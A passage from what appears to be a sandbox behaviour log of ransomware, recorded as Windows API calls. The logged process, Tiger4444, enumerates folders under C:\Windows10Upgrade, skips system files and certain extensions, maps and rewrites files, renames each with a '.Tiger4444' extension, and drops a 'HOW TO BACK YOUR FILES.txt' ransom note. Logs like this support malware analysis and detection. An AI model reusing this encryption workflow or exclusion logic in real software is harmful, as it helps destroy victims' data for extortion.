dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0042.983] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0042.986] FlushFileBuffers (hFile=0x2ac) returned 1 [0042.987] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0042.987] CloseHandle (hObject=0x2ac) returned 1 [0042.988] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css") returned 52 [0042.988] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.988] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7ea2abb8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d08 [0042.988] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.988] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.988] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0042.988] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.988] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7ea2abb8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.988] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.988] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.988] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0042.988] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.988] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.988] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7ea2abb8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7ea2abb8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7ea50dfb, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0042.988] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.988] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0042.988] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x9ff9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oobe-desktop.css", cAlternateFileName="OOBE-D~1.CSS")) returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="Tiger4444.exe") returned -1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2=".") returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="..") returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="windows") returned -1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="bootmgr") returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="pagefile.sys") returned -1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="boot") returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="ids.txt") returned 1 [0042.988] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="NTUSER.DAT") returned 1 [0042.988] lstrcpyW (in: lpString1=0x30aeb12, lpString2="oobe-desktop.css" | out: lpString1="oobe-desktop.css") returned="oobe-desktop.css" [0042.988] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css", dwFileAttributes=0x0) returned 1 [0042.989] lstrlenW (lpString="oobe-desktop.css") returned 16 [0042.989] lstrlenW (lpString="Tiger4444") returned 9 [0042.989] lstrcmpiW (lpString1="sktop.css", lpString2="Tiger4444") returned -1 [0042.989] lstrlenW (lpString=".dll") returned 4 [0042.989] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0042.989] lstrlenW (lpString=".lnk") returned 4 [0042.989] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0042.989] lstrlenW (lpString=".ini") returned 4 [0042.989] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0042.989] lstrlenW (lpString=".sys") returned 4 [0042.989] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0042.989] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0042.989] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0042.989] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13444237964) returned 1 [0042.989] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=40953) returned 1 [0042.989] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0042.989] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0042.989] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa300, lpName=0x0) returned 0x2c8 [0042.990] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa300) returned 0xbe0000 [0042.993] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0042.993] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0042.993] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0042.993] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0042.993] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0042.993] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0042.993] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0042.993] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0042.993] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13444660968) returned 1 [0042.994] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0042.994] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0042.994] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0042.994] CloseHandle (hObject=0x2c8) returned 1 [0042.994] CloseHandle (hObject=0x260) returned 1 [0042.996] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css.Tiger4444") returned 79 [0042.996] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css.tiger4444"), dwFlags=0x1) returned 1 [0042.996] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=40960 | out: Addend=0xc6f980) returned 9248816 [0042.996] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 3295 [0042.996] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x41b67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui-dark.css", cAlternateFileName="")) returned 1 [0042.996] lstrcmpiW (lpString1="ui-dark.css", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0042.996] lstrcmpiW (lpString1="ui-dark.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.996] lstrcmpiW (lpString1="ui-dark.css", lpString2="Tiger4444.exe") returned 1 [0042.996] lstrcmpiW (lpString1="ui-dark.css", lpString2=".") returned 1 [0042.997] lstrcmpiW (lpString1="ui-dark.css", lpString2="..") returned 1 [0042.997] lstrcmpiW (lpString1="ui-dark.css", lpString2="windows") returned -1 [0042.997] lstrcmpiW (lpString1="ui-dark.css", lpString2="bootmgr") returned 1 [0042.997] lstrcmpiW (lpString1="ui-dark.css", lpString2="pagefile.sys") returned 1 [0042.997] lstrcmpiW (lpString1="ui-dark.css", lpString2="boot") returned 1 [0042.997] lstrcmpiW (lpString1="ui-dark.css", lpString2="ids.txt") returned 1 [0042.997] lstrcmpiW (lpString1="ui-dark.css", lpString2="NTUSER.DAT") returned 1 [0042.997] lstrcpyW (in: lpString1=0x30aeb12, lpString2="ui-dark.css" | out: lpString1="ui-dark.css") returned="ui-dark.css" [0042.997] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css", dwFileAttributes=0x0) returned 1 [0042.997] lstrlenW (lpString="ui-dark.css") returned 11 [0042.997] lstrlenW (lpString="Tiger4444") returned 9 [0042.997] lstrcmpiW (lpString1="-dark.css", lpString2="Tiger4444") returned -1 [0042.997] lstrlenW (lpString=".dll") returned 4 [0042.997] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0042.997] lstrlenW (lpString=".lnk") returned 4 [0042.997] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0042.997] lstrlenW (lpString=".ini") returned 4 [0042.997] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0042.997] lstrlenW (lpString=".sys") returned 4 [0042.997] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0042.997] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0042.998] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0042.998] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13445065365) returned 1 [0042.998] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=269159) returned 1 [0042.998] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0042.998] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0042.998] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x41e70, lpName=0x0) returned 0x2c8 [0042.999] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41e70) returned 0xbe0000 [0043.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0043.056] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0043.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.056] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0043.056] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.056] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0043.056] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13450958269) returned 1 [0043.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0043.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0043.057] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.059] CloseHandle (hObject=0x2c8) returned 1 [0043.059] CloseHandle (hObject=0x260) returned 1 [0043.065] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css.Tiger4444") returned 74 [0043.065] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css.tiger4444"), dwFlags=0x1) returned 1 [0043.067] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=269168 | out: Addend=0xc6f980) returned 9289776 [0043.067] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=58 | out: Addend=0xc6f98c) returned 3299 [0043.067] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x41b67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui-dark.css", cAlternateFileName="")) returned 0 [0043.067] FindClose (in: hFindFile=0xc72d08 | out: hFindFile=0xc72d08) returned 1 [0043.067] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0043.067] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0043.068] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0043.068] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0043.069] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.070] CloseHandle (hObject=0x260) returned 1 [0043.070] CloseHandle (hObject=0x2ac) returned 1 [0043.070] GetCurrentThreadId () returned 0xfa8 [0043.070] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665a8 [0043.070] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\resources\\ux\\EULA", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA" [0043.070] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0043.070] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665a0 | out: hHeap=0xc50000) returned 1 [0043.071] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\EULA" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA" [0043.071] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA\\" [0043.071] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3" [0043.071] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0043.084] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0043.088] FlushFileBuffers (hFile=0x2ac) returned 1 [0043.089] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0043.089] CloseHandle (hObject=0x2ac) returned 1 [0043.090] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\EULA") returned 37 [0043.090] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0043.090] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3c4d9e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7eb35d08, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d08 [0043.090] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.090] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.090] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0043.090] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0043.090] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3c4d9e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7eb35d08, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.140] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.140] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.140] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0043.140] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0043.140] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0043.140] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7eb35d08, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7eb35d08, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7eb35d08, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0043.140] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.140] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0043.140] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c6124, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c6124, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1af6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ar-sa.htm", cAlternateFileName="EULA_A~1.HTM")) returned 1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="Tiger4444.exe") returned -1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2=".") returned 1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="..") returned 1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="windows") returned -1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="bootmgr") returned 1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="pagefile.sys") returned -1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="boot") returned 1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="ids.txt") returned -1 [0043.140] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="NTUSER.DAT") returned -1 [0043.140] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_ar-sa.htm" | out: lpString1="EULA_ar-sa.htm") returned="EULA_ar-sa.htm" [0043.140] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm", dwFileAttributes=0x0) returned 1 [0043.141] lstrlenW (lpString="EULA_ar-sa.htm") returned 14 [0043.141] lstrlenW (lpString="Tiger4444") returned 9 [0043.141] lstrcmpiW (lpString1="ar-sa.htm", lpString2="Tiger4444") returned -1 [0043.141] lstrlenW (lpString=".dll") returned 4 [0043.141] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.141] lstrlenW (lpString=".lnk") returned 4 [0043.141] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.141] lstrlenW (lpString=".ini") returned 4 [0043.141] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.141] lstrlenW (lpString=".sys") returned 4 [0043.141] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.141] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.143] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.143] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13459634459) returned 1 [0043.143] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=110445) returned 1 [0043.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0043.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0043.143] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b270, lpName=0x0) returned 0x2c8 [0043.144] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b270) returned 0xbe0000 [0043.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0043.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0043.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, 